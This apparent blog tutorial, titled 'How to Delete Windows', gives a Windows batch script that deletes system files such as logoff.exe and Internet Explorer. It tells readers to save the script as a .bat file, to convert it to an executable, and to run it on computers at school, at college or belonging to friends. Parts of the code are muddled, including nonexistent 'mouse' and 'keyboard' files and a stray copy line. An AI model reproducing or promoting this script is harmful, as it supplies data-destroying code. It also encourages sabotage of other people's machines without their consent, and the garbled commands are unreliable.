How to Delete Windows

By
Advertisement
In this Tutorial you will learn How To Delete Windows.


Please follow these steps : 


Step 1  >> Open Notepad .(Press Win+R and type Notepad)
Step 2 >> Copy This Code..
-----------------------------------------------------------------------------------------------------
@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

--------------------------------------------------------------------------------------------------------------
Step 3 >> Paste Into Notepad.
Step 4 >> Save File As DelWin.bat (.bat is Must.)

Note :-Save Type Is also selected Txt but You Must Select All Files.

Try this in your school or college or in your friend computer.. 

You Can Also Convert Into Exe File .
Free Download Exe Converte From Here ..

0 comments:

Post a Comment